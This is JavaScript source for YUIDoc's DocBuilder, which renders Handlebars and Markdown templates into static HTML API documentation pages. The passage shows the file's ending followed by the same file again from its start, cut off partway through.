path.join(self.options.outdir, d); path.exists(dir, stack.add(function(x) { if (!x) { fs.mkdir(dir, 0777, stack.add(function() { writeRedirect(dir, defaultIndex, stack.add(noop)); })); } else { writeRedirect(dir, defaultIndex, stack.add(noop)); } })); }); stack.done(function() { if (cb) { cb(); } }); }, /** * Parses `<pre><code>` tags and adds the __prettyprint__ `className` to them * @method _parseCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _parseCode: function (html) { html = html || ''; html = html.replace(/<pre><code>/g, '<pre class="code"><code class="prettyprint">'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck), this handles ```'s in fields that are not parsed by the **Markdown** parser. * @method _inlineCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _inlineCode: function(html) { html = html.replace(/\\`/g, '__{{SELLECK_BACKTICK}}__'); html = html.replace(/`(.+?)`/g, function (match, code) { return '<code>' + Y.escapeHTML(code) + '</code>'; }); html = html.replace(/__\{\{SELLECK_BACKTICK\}\}__/g, '`'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck) Renders the handlebars templates with the default View class. * @method render * @param {HTML} source The default template to parse * @param {Class} view The default view handler * @param {HTML} [layout=null] The HTML from the layout to use. * @param {Object} [partials=object] List of partials to include in this template * @param {Callback} callback * @param {Error} callback.err * @param {HTML} callback.html The assembled template markup */ render: function(source, view, layout, partials, callback) { var html = []; function buffer(line) { html.push(line); } // Allow callback as third or fourth param. if (typeof partials === 'function') { callback = partials; partials = {}; } else if (typeof layout === 'function') { callback = layout; layout = null; } var parts = Y.merge(partials || {}, { layout_content: source }); Y.each(parts, function(source, name) { Y.Handlebars.registerPartial(name, source); }); if (!TEMPLATE || !this.cacheTemplates) { TEMPLATE = Y.Handlebars.compile(layout); } var _v = {}; for (var k in view) { if (Y.Lang.isFunction(view[k])) { _v[k] = view[k](); } else { _v[k] = view[k]; } }; html = TEMPLATE(_v); html = this._inlineCode(html); callback(null, html); }, /** * Render the index file * @method renderIndex * @param {Function} cb The callback fired when complete * @param {String} cb.html The HTML to render this view * @param {Object} cv.view The View Data */ renderIndex: function(cb) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta.title = self.data.project.name; opts.meta.projectRoot = './'; opts.meta.projectAssets = './assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); var view = new Y.DocView(opts.meta); self.render('{{>index}}', view, opts.layouts.main, opts.partials, function(err, html) { self.files++; cb(html, view); }); }); }, /** * Generates the index.html file * @method writeIndex * @param {Callback} cb The callback to execute after it's completed */ writeIndex: function(cb) { var self = this, stack = new Y.Parallel(); Y.log('Preparing index.html', 'info', 'builder'); self.renderIndex(stack.add(function(html, view) { stack.html = html; stack.view = view; if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'index.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'index.html'), html, stack.add(noop)); })); stack.done(function(html, view) { Y.log('Writing index.html', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderModule: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); data.displayName = data.name; data.name = self.filterFileName(data.name); Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta = Y.merge(opts.meta, data); //opts.meta.htmlTitle = v.name + ': ' + self.data.project.name; opts.meta.title = self.data.project.name; opts.meta.moduleName = data.displayName || data.name; opts.meta.moduleDescription = self._parseCode(markdown(data.description || ' ')); opts.meta.file = data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); if (data.classes && Object.keys(data.classes).length) { opts.meta.moduleClasses = []; Y.each(Object.keys(data.classes), function(name) { var i = self.data.classes[name]; if (i) { opts.meta.moduleClasses.push({ name: i.name, displayName: i.name }); } }); opts.meta.moduleClasses.sort(self.nameSort); } if (data.submodules && Object.keys(data.submodules).length) { opts.meta.subModules = []; Y.each(Object.keys(data.submodules), function(name) { var i = self.data.modules[name]; if (i) { opts.meta.subModules.push({ name: i.name, displayName: i.name, description: i.description }); } }); opts.meta.subModules.sort(self.nameSort); } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>module}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the module files under "out"/modules/ * @method writeModules * @param {Callback} cb The callback to execute after it's completed */ writeModules: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.modules).length + ' modules pages.', 'info', 'builder'); Y.each(self.data.modules, function(v) { if (v.external) { return } self.renderModule(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'module_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'modules', v.name + '.html'), html, stack.add(noop)); }, v, layout); }); stack.done(function() { Y.log('Finished writing module files', 'info', 'builder'); cb(stack.html, stack.view); }); }, hasProperty: function(a, b) { var other; var h = Y.some(a, function(i, k) { if ((i.itemtype === b.itemtype) && (i.name === b.name)) { other = k; return true; } }); return other; }, mergeExtends: function(info, classItems) { var self = this; if (info.extends || info.uses) { var hasItems = {}; hasItems[info.extends] = 1; if (info.uses) { info.uses.forEach(function(v) { hasItems[v] = 1; }); } self.data.classitems.forEach(function(v) { //console.error(v.class, '==', info.extends); if (hasItems[v.class]) { if (!v.static) { var override = self.hasProperty(classItems, v); if (!override) { //This method was extended from the parent class but not over written //console.error('Merging extends from', v.class, 'onto', info.name); var q = Y.merge({}, v); q.extended_from = v.class; classItems.push(q); } else { //This method was extended from the parent and overwritten in this class var q = Y.merge({}, v); q = self.augmentData(q); classItems[override].overwritten_from = q; } } } }); if (self.data.classes[info.extends]) { if (self.data.classes[info.extends].extends || self.data.classes[info.extends].uses) { //console.error('Stepping down to:', self.data.classes[info.extends]); classItems = self.mergeExtends(self.data.classes[info.extends], classItems); } } } return classItems; }, renderClass: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { //console.log(opts); if (err) { console.log(err); } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.file = data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.classDescription = self._parseCode(markdown(data.description || ' ')); opts.meta.methods = []; opts.meta.properties = []; opts.meta.attrs = []; opts.meta.events = []; opts.meta.extension_for = null; if (data.uses) { opts.meta.uses = data.uses; } if (data.entension_for && data.extension_for.length) { opts.meta.extension_for = data.extension_for; } if (data.extends) { opts.meta.extends = data.extends; } var classItems = []; self.data.classitems.forEach(function(i) { if (i.class === data.name) { classItems.push(i); } }); classItems = self.mergeExtends(data, classItems); if (data.is_constructor) { var i = Y.mix({}, data); i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + ((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description)); i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } //console.error(i); opts.meta.is_constructor = [i]; } classItems.forEach(function(i) { switch (i.itemtype) { case 'method': i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + ((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description || '')); i.methodDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.methods.push(i); break; case 'property': i = self.augmentData(i); //i.propertyDescription = self._parseCode(markdown(i.description || '')); i.propertyDescription = self._parseCode(i.description); if (!i.type) { i.type = 'unknown'; } if (i.final === '') { i.final = true; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.properties.push(i); break; case 'attribute': // fallthru case 'config': i = self.augmentData(i); //i.attrDescription = self._parseCode(markdown(i.description || '')); i.attrDescription = self._parseCode(i.description); if (i.itemtype === 'config') { i.config = true; } else { i.emit = self.options.attributesEmit; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.attrs.push(i); break; case 'event': i = self.augmentData(i); //i.eventDescription = self._parseCode(markdown(i.description || '')); i.eventDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.events.push(i); break; } }); opts.meta.attrs.sort(self.nameSort); opts.meta.events.sort(self.nameSort); opts.meta.methods.sort(self.nameSort); opts.meta.properties.sort(self.nameSort); if (!opts.meta.methods.length) { delete opts.meta.methods; } if (!opts.meta.properties.length) { delete opts.meta.properties; } if (!opts.meta.attrs.length) { delete opts.meta.attrs; } if (!opts.meta.events.length) { delete opts.meta.events; } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>classes}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the class files under "out"/classes/ * @method writeClasses * @param {Callback} cb The callback to execute after it's completed */ writeClasses: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.classes).length + ' class pages.', 'info', 'builder'); Y.each(self.data.classes, function(v) { if (v.external) { return } self.renderClass(stack.add(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'classes_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'classes', v.name + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing class files', 'info', 'builder'); cb(stack.html, stack.view); }); }, /** * Sort method of array of objects with a property called __name__ * @method nameSort * @param {Object} a First object to compare * @param {Object} b Second object to compare * @return {Number} 1, -1 or 0 for sorting. */ nameSort: function(a, b) { if (!a.name || !b.name) { return 0; } var an = a.name.toLowerCase(), bn = b.name.toLowerCase(), ret = 0; if (an < bn) { ret = -1; } if (an > bn) { ret = 1 } return ret; }, /** * Generates the syntax files under `"out"/files/` * @method writeFiles * @param {Callback} cb The callback to execute after it's completed */ writeFiles: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.files).length + ' source files.', 'info', 'builder'); Y.each(self.data.files, function(v) { if (v.external) { return } self.renderFile(stack.add(function(html, view, data) { if (!view || !data) { return; } stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'files_' + self.filterFileName(data.name) + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'files', self.filterFileName(data.name) + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing source files', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderFile: function(cb, data, layout) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { if (err) { console.log(err); } if (!data.name) { return; } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.fileName = data.name; fs.readFile(opts.meta.fileName, 'utf8', Y.rbind(function(err, str, opts, data) { if (err) { Y.log(err, 'error', 'builder'); cb(err); return; } opts.meta.fileData = str; var view = new Y.DocView(opts.meta, 'index'); var mainLayout = opts.layouts[layout]; self.render('{{>files}}', view, mainLayout, opts.partials, function(err, html) { self.files++; cb(html, view, data); }); }, this, opts, data)); }); }, writeAPIMeta: function(cb) { Y.log('Writing API Meta Data', 'info', 'builder'); var self = this; this.renderAPIMeta(function(js) { fs.writeFile(path.join(self.options.outdir, 'api.js'), js, 'utf8', cb); }); }, renderAPIMeta: function(cb) { var opts = { meta: {} }, self = this; opts = this.populateClasses(opts); opts = this.populateModules(opts); ['classes', 'modules'].forEach(function(id) { opts.meta[id].forEach(function(v, k) { opts.meta[id][k] = v.name; if (v.submodules) { v.submodules.forEach(function(s) { opts.meta[id].push(s.displayName); }); } }); opts.meta[id].sort(); }); var apijs = 'YUI.add("yuidoc-meta", function(Y) {\n' + ' Y.YUIDoc = { meta: ' + JSON.stringify(opts.meta, null, 4) + ' };\n' + '});'; cb(apijs); }, /** * Normalizes a file path to a writable filename: * * var path = 'lib/file.js'; * returns 'lib_file.js'; * * @method filterFileName * @param {String} f The filename to normalize * @return {String} The filtered file path */ filterFileName: function(f) { return f.replace(/[\/\\]/g, '_'); }, /** * Compiles the templates from the meta-data provided by DocParser * @method compile * @param {Callback} cb The callback to execute after it's completed */ compile: function(cb) { var self = this; var starttime = (new Date()).getTime(); Y.log('Compiling Templates', 'info', 'builder'); this.mixExternal(function() { self.makeDirs(function() { Y.log('Copying Assets', 'info', 'builder'); if (!Y.Files.isDirectory(path.join(self.options.outdir, 'assets'))) { fs.mkdirSync(path.join(self.options.outdir, 'assets'), 0777); } Y.Files.copyAssets([path.join(DEFAULT_THEME, 'assets'), path.join(themeDir, 'assets')], path.join(self.options.outdir, 'assets'), false, function() { var cstack = new Y.Parallel(); self.writeModules(cstack.add(function() { self.writeClasses(cstack.add(function() { if (!self.options.nocode) { self.writeFiles(cstack.add(noop)); } })); })); self.writeIndex(cstack.add(noop)); self.writeAPIMeta(cstack.add(noop)); cstack.done(function() { var endtime = (new Date()).getTime(); var timer = ((endtime - starttime) / 1000) + ' seconds'; Y.log('Finished writing ' + self.files + ' files in ' + timer, 'info', 'builder'); if (cb) { cb(); } }); }); }); }); } } });
lib/builder.js
/* Copyright (c) 2011, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://yuilibrary.com/license/ */ var markdown = require("node-markdown").Markdown, fs = require('graceful-fs'), noop = function() {}, path = require('path'), DEFAULT_RETURN_TAGS = 'code|em|strong|span|a|pre|dl|dd|dt|ul|li|ol', TEMPLATE, /** * Takes a type string and converts it to a "First letter upper cased" type. e.g. `(string -> String, object -> Object)` * @method fixType * @private * @param {String} t The type string to convert * @return {String} The fixed string */ fixType = function(t) { var firstChar = t.charAt(0), upperFirstChar = firstChar.toUpperCase(); if (firstChar !== upperFirstChar) { return upperFirstChar + t.substring(1); } return t; }; /** * Takes the `JSON` data from the `DocParser` class, creates and parses markdown and handlebars based templates to generate static HTML content * @class DocBuilder * @module yuidoc */ YUI.add('doc-builder', function(Y) { var print = function(items) { var out = '<ul>'; Y.each(items, function(i, k) { out += '<li>'; if (Y.Lang.isObject(i)) { if (!i.path) { out += k + '/' + print(i); } else { out += '<a href="../files/' + i.name + '.html">' + k + '</a>'; } } out += '</li>'; }); out += '</ul>'; return out; }; Y.Handlebars.registerHelper('buildFileTree', function(items, fn) { return print(items); }); var DEFAULT_THEME = themeDir = path.join(__dirname, '../', 'themes', 'default'); Y.DocBuilder = function(options, data) { this.options = options; if (options.themedir) { themeDir = options.themedir; } this.data = data; Y.log('Building..', 'info', 'builder'); this.files = 0; var self = this; Y.Handlebars.registerHelper('crossLink', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item); } return str; }); Y.Handlebars.registerHelper('crossLinkModule', function(item, fn) { var str = item; if (self.data.modules[item]) { str = '<a href="../modules/' + item + '.html">' + item + '</a>'; } return str; }); Y.Handlebars.registerHelper('crossLinkRaw', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i, true)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item, true); } return str; }); this.cacheTemplates = true; if (options.cacheTemplates === false) { this.cacheTemplates = false; } }; Y.DocBuilder.prototype = { _parseCrossLink: function(item, raw) { item = fixType(item); var self = this; var base = '../', baseName = item, newWin = false, className = 'crosslink'; item = baseItem = Y.Lang.trim(item.replace('{', '').replace('}', '')); //Remove Cruft item = item.replace('*', '').replace('[', '').replace(']', ''); var link = false, href; if (self.data.classes[item]) { link = true; } else { if (self.data.classes[item.replace('.', '')]) { link = true; item = item.replace('.', ''); } } if (self.options.externalData) { if (self.data.classes[item]) { if (self.data.classes[item].external) { href = self.data.classes[item].path; base = self.options.externalData.base; className += ' external'; newWin = true; link = true; } } } /* if (!link && self.options.externalData) { var d = self.options.externalData; if (d && d.classes[item]) { href = d.classes[item].path; base = d.base; className += ' external'; newWin = true; link = true; } } */ if (item === 'Object' || item === 'Array') { link = false; } if (!href) { href = path.join(base, 'classes', item + '.html'); if (base.match(/^https?:\/\//)) { href = base + path.join('classes', item + '.html'); } } if (!link && self.options.linkNatives) { if (self.NATIVES && self.NATIVES[item]) { href = self.NATIVES_LINKER(item); if (href) { className += ' external'; newWin = true; link = true; } } } if (link) { item = '<a href="' + href + '" class="' + className + '"' + ((newWin) ? ' target="_blank"' : '') + '>' + baseItem + '</a>'; } return (raw) ? href : item; }, NATIVES: { 'Array': 1, 'Boolean': 1, 'Date': 1, 'decodeURI': 1, 'decodeURIComponent': 1, 'encodeURI': 1, 'encodeURIComponent': 1, 'eval': 1, 'Error': 1, 'EvalError': 1, 'Function': 1, 'Infinity': 1, 'isFinite': 1, 'isNaN': 1, 'Math': 1, 'NaN': 1, 'Number': 1, 'Object': 1, 'parseFloat': 1, 'parseInt': 1, 'RangeError': 1, 'ReferenceError': 1, 'RegExp': 1, 'String': 1, 'SyntaxError': 1, 'TypeError': 1, 'undefined': 1, 'URIError': 1, 'HTMLElement': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLCollection': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'DocumentFragment': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLDocument': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/' }, NATIVES_LINKER: function(name) { var url = 'https:/'+'/developer.mozilla.org/en/JavaScript/Reference/Global_Objects/'; if (this.NATIVES[name] !== 1) { url = this.NATIVES[name]; } return url + name; }, _mixExternal: function() { var self = this; Y.log('External data received, mixing', 'info', 'builder'); var exData = self.options.externalData; ['files', 'classes', 'modules'].forEach(function(k) { Y.each(exData[k], function(item, key) { item.external = true; var file = item.name; if (!item.file) { file = self.filterFileName(item.name); } item.path = exData.base + path.join(k, file + '.html'); self.data[k][key] = item; }); }); Y.each(exData.classitems, function(item) { item.external = true; item.path = exData.base + path.join('files', self.filterFileName(item.file) + '.html'); self.data.classitems.push(item); }); }, mixExternal: function(cb) { var self = this, info = self.options.external; if (!info) { cb(); return; } if (!info.merge) { info.merge = 'mix'; } if (!info.data) { Y.log('External config found but no data path defined, skipping import.', 'warn', 'builder'); cb(); return; } if (!Y.Lang.isArray(info.data)) { info.data = [ info.data ]; } Y.log('Importing external documentation data.', 'info', 'builder'); var stack = new Y.Parallel(); info.data.forEach(function(i) { var base; if (i.match(/^https?:\/\//)) { base = i.replace('data.json', ''); Y.use('io-base', stack.add(function() { Y.io(i, { on: { complete: stack.add(function(id, e) { var data = JSON.parse(e.responseText); data.base = base; self.options.externalData = Y.mix(self.options.externalData || {}, data); }) } }); })); } else { base = path.dirname(path.resolve(i)); var data = Y.Files.getJSON(i); data.base = base; self.options.externalData = Y.mix(self.options.externalData || {}, data); } }); stack.done(function() { Y.log('Finished fetching remote data', 'info', 'builder'); self._mixExternal(); cb(); }); }, /** * The default tags to use in params descriptions (for Markdown). * @property defaultTags * @type String */ defaultReturnTags: DEFAULT_RETURN_TAGS, defaultTags: 'p|' + DEFAULT_RETURN_TAGS, /** * File counter * @property files * @type Number */ files: null, /** * Prep the meta data to be fed to Selleck * @method getProjectMeta * @return {Object} The project metadata */ _meta: null, getProjectMeta: function() { var obj = { meta: { yuiSeedUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/yui/yui-min.js', yuiGridsUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/cssgrids/cssgrids-min.css' } }; if (!this._meta) { try { var meta; if (fs.existsSync(path.join(themeDir, 'theme.json'))) { meta = Y.Files.getJSON(path.join(themeDir, 'theme.json')); } else if (DEFAULT_THEME !== themeDir) { if (fs.existsSync(path.join(DEFAULT_THEME))) { meta = Y.Files.getJSON(path.join(DEFAULT_THEME, 'theme.json')); } } if (meta) { obj.meta = meta; this._meta = meta; } } catch (e) {} } else { obj.meta = this._meta; } Y.each(this.data.project, function(v, k) { var key = k.substring(0, 1).toUpperCase() + k.substring(1, k.length); obj.meta['project' + key] = v; }); return obj }, /** * Populate the meta data for classes * @method populateClasses * @param {Object} opts The original options * @return {Object} The modified options */ populateClasses: function(opts) { opts.meta.classes = []; Y.each(this.data.classes, function(v) { if (v.external) { return } opts.meta.classes.push({ displayName: v.name, name: v.name}); }); opts.meta.classes.sort(this.nameSort); return opts; }, /** * Populate the meta data for modules * @method populateModules * @param {Object} opts The original options * @return {Object} The modified options */ populateModules: function(opts) { var self = this; opts.meta.modules = []; opts.meta.allModules = []; Y.each(this.data.modules, function(v) { if (v.external) { return } opts.meta.allModules.push({ displayName: v.displayName || v.name, name: self.filterFileName(v.name), description: v.description }); if (!v.is_submodule) { var o = { displayName: v.displayName || v.name, name: self.filterFileName(v.name) }; if (v.submodules) { o.submodules = []; Y.each(v.submodules, function(i, k) { moddef = self.data.modules[k]; if (moddef) { o.submodules.push({ displayName: k, description: moddef.description }); } else { //Y.log('Submodule data missing: ' + k + ' for ' + v.name, 'warn', 'builder'); } }); o.submodules.sort(self.nameSort); } opts.meta.modules.push(o); } }); opts.meta.modules.sort(this.nameSort); opts.meta.allModules.sort(this.nameSort); return opts; }, /** * Populate the meta data for files * @method populateFiles * @param {Object} opts The original options * @return {Object} The modified options */ populateFiles: function(opts) { var self = this; opts.meta.files = []; Y.each(this.data.files, function(v) { if (v.external) { return } opts.meta.files.push({ displayName: v.name, name: self.filterFileName(v.name), path: v.path || v.name }); }); var tree = {}; var files = []; Y.each(this.data.files, function(v) { if (v.external) { return } files.push(v.name); }); files.sort(); Y.each(files, function(v) { var p = v.split('/'), par; p.forEach(function(i, k) { if (!par) { if (!tree[i]) { tree[i] = {}; } par = tree[i]; } else { if (!par[i]) { par[i] = {}; } if (k + 1 === p.length) { par[i] = { path: v, name: self.filterFileName(v) }; } par = par[i]; } }); }); opts.meta.fileTree = tree; return opts; }, addFoundAt: function(a) { var self = this; if (a.file && a.line && !self.options.nocode) { a.foundAt = '../files/' + self.filterFileName(a.file) + '.html#l' + a.line; if (a.path) { a.foundAt = a.path + '#l' + a.line; } } return a; }, /** * Augments the **DocParser** meta data to provide default values for certain keys as well as parses all descriptions * with the `Markdown Parser` * @method augmentData * @param {Object} o The object to recurse and augment * @return {Object} The augmented object */ augmentData: function(o) { var self = this; o = self.addFoundAt(o); Y.each(o, function(i, k1) { if (i && i.forEach) { Y.each(i, function(a, k) { if (!(a instanceof Object)) { return; } if (!a.type) { a.type = 'Object'; //Default type is Object } if (a.final === '') { a.final = true; } if (!a.description) { a.description = ' '; } else { a.description = markdown(a.description, true, self.defaultTags); } if (a.example) { a.example = markdown(a.example, true, self.defaultTags); } a = self.addFoundAt(a); Y.each(a, function(c, d) { if (c.forEach || (c instanceof Object)) { c = self.augmentData(c); a[d] = c; } }); o[k1][k] = a; }); } else if (i instanceof Object) { i = self.addFoundAt(i); Y.each(i, function(v, k) { if (k === 'final') { o[k1][k] = true; } if (k === 'description' || k === 'example') { if (k1 === 'return') { o[k1][k] = markdown(v, true, self.defaultReturnTags); } else if (v.forEach || (v instanceof Object)) { o[k1][k] = self.augmentData(v); } else { o[k1][k] = markdown(v, true, self.defaultTags); } } }); } else if (k1 === 'description' || k1 === 'example') { o[k1] = markdown(i, true, self.defaultTags); } }); return o; }, /** * Makes the default directories needed * @method makeDirs * @param {Callback} cb The callback to execute after it's completed */ makeDirs: function(cb) { var self = this; var dirs = ['classes', 'modules', 'files']; if (self.options.dumpview) { dirs.push('json'); } var writeRedirect = function(dir, file, cb) { path.exists(file, function(x) { if (x) { var out = path.join(dir, 'index.html'); fs.createReadStream(file).pipe(fs.createWriteStream(out)); } cb(); }); }; var defaultIndex = path.join(themeDir, 'assets', 'index.html'); var stack = new Y.Parallel(); Y.log('Making default directories: ' + dirs.join(','), 'info', 'builder'); dirs.forEach(function(d) { var dir = path.join(self.options.outdir, d); path.exists(dir, stack.add(function(x) { if (!x) { fs.mkdir(dir, 0777, stack.add(function() { writeRedirect(dir, defaultIndex, stack.add(noop)); })); } else { writeRedirect(dir, defaultIndex, stack.add(noop)); } })); }); stack.done(function() { if (cb) { cb(); } }); }, /** * Parses `<pre><code>` tags and adds the __prettyprint__ `className` to them * @method _parseCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _parseCode: function (html) { html = html || ''; html = html.replace(/<pre><code>/g, '<pre class="code"><code class="prettyprint">'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck), this handles ```'s in fields that are not parsed by the **Markdown** parser. * @method _inlineCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _inlineCode: function(html) { html = html.replace(/\\`/g, '__{{SELLECK_BACKTICK}}__'); html = html.replace(/`(.+?)`/g, function (match, code) { return '<code>' + Y.escapeHTML(code) + '</code>'; }); html = html.replace(/__\{\{SELLECK_BACKTICK\}\}__/g, '`'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck) Renders the handlebars templates with the default View class. * @method render * @param {HTML} source The default template to parse * @param {Class} view The default view handler * @param {HTML} [layout=null] The HTML from the layout to use. * @param {Object} [partials=object] List of partials to include in this template * @param {Callback} callback * @param {Error} callback.err * @param {HTML} callback.html The assembled template markup */ render: function(source, view, layout, partials, callback) { var html = []; function buffer(line) { html.push(line); } // Allow callback as third or fourth param. if (typeof partials === 'function') { callback = partials; partials = {}; } else if (typeof layout === 'function') { callback = layout; layout = null; } var parts = Y.merge(partials || {}, { layout_content: source }); Y.each(parts, function(source, name) { Y.Handlebars.registerPartial(name, source); }); if (!TEMPLATE || !this.cacheTemplates) { TEMPLATE = Y.Handlebars.compile(layout); } var _v = {}; for (var k in view) { if (Y.Lang.isFunction(view[k])) { _v[k] = view[k](); } else { _v[k] = view[k]; } }; html = TEMPLATE(_v); html = this._inlineCode(html); callback(null, html); }, /** * Render the index file * @method renderIndex * @param {Function} cb The callback fired when complete * @param {String} cb.html The HTML to render this view * @param {Object} cv.view The View Data */ renderIndex: function(cb) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta.title = self.data.project.name; opts.meta.projectRoot = './'; opts.meta.projectAssets = './assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); var view = new Y.DocView(opts.meta); self.render('{{>index}}', view, opts.layouts.main, opts.partials, function(err, html) { self.files++; cb(html, view); }); }); }, /** * Generates the index.html file * @method writeIndex * @param {Callback} cb The callback to execute after it's completed */ writeIndex: function(cb) { var self = this, stack = new Y.Parallel(); Y.log('Preparing index.html', 'info', 'builder'); self.renderIndex(stack.add(function(html, view) { stack.html = html; stack.view = view; if (self.options.dumpview) { 